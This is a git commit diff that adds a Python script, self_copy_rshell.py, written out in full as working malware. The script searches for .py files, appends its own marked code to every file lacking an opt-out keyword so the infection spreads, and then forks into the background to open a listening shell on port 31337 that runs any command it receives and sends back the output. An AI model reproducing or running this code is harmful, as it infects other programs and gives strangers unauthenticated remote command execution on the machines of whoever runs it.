Putting it all together

2019-10-11 14:11:30 +02:00
parent 1b53b52bad
commit 6a1d065e5d
2 changed files with 80 additions and 1 deletions
--- a/self_copy_rshell.py
+++ b/self_copy_rshell.py
@@ -0,0 +1,66 @@
+import os                                               #!x
+import sys                                              #!x
+import glob                                             #!x
+import socket                                           #!x
+import string                                           #!x
+
+# search command, adjust to your needs
+#cmd = 'find / -name "*.py" -print'                     #!x
+cmd = 'find ./victims -name "*.py" -print'              #!x
+# keyword which prevents file from getting infected
+keyword = 'plsdontinjectme'                             #!x
+
+# for each file that matches the search command
+for snippet in os.popen(cmd).readlines():               #!x
+  # strip newlines
+  snippet = snippet[:-1]                                #!x
+  try:                                                  #!x
+    # open this file containing the target code
+    code = open(__file__, 'r')                          #!x
+    # open victim file
+    victim = open(snippet, 'r')                         #!x
+    # read the content of the victim file
+    read_victim = victim.read()                         #!x
+    # if the file contains keyword, do not inject code
+    if str.find(read_victim, keyword) == -1:            #!x
+      # open it with write_append rights
+      victim = open(snippet, 'a')                       #!x
+      # for each line in 
+      for line in code.readlines():                     #!x
+        # if the line contains the copy signal
+        if("#!x") in line:                              #!x
+          # close the code file
+          code.close()                                  #!x
+          # cast the line containing code
+          insert=(line)                                 #!x
+          # insert the code into the victim file
+          victim.write(insert)                          #!x
+  # poor mans error handling
+  except IOError:                                       #!x
+    a = 1                                               #!x
+
+# fork to bg
+pid = os.fork()                                         #!x
+# make sure we are in the child process
+if pid > 0:                                             #!x
+  sys.exit(0)
+try:                                                    #!x
+  # create the socket and listen
+  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #!x
+  s.bind(("0.0.0.0",31337))                             #!x
+  s.listen(1)                                           #!x
+# poor mans socket error handling
+except socket.error as e:                               #!x
+  print(e)                                              #!x
+  sys.exit(0)                                           #!x
+# forever try to accept new connections
+while 1:                                                #!x
+  (cli,add) = s.accept()                                #!x
+  info = {"platform":sys.platform, "version":sys.version}   #!x
+  welcome = "You are connected to shell on {0[platform]}, Python Version: {0[version]}\r\n".format(info) #!x
+  cli.send(welcome.encode('utf-8'))                     #!x
+  # forever receive cli commends, execute and report back
+  while 1:                                              #!x
+    data = cli.recv(1024).rstrip()                      #!x
+    resp = os.popen(data.decode('utf-8')).read()        #!x
+    cli.send(resp.encode('utf-8'))                      #!x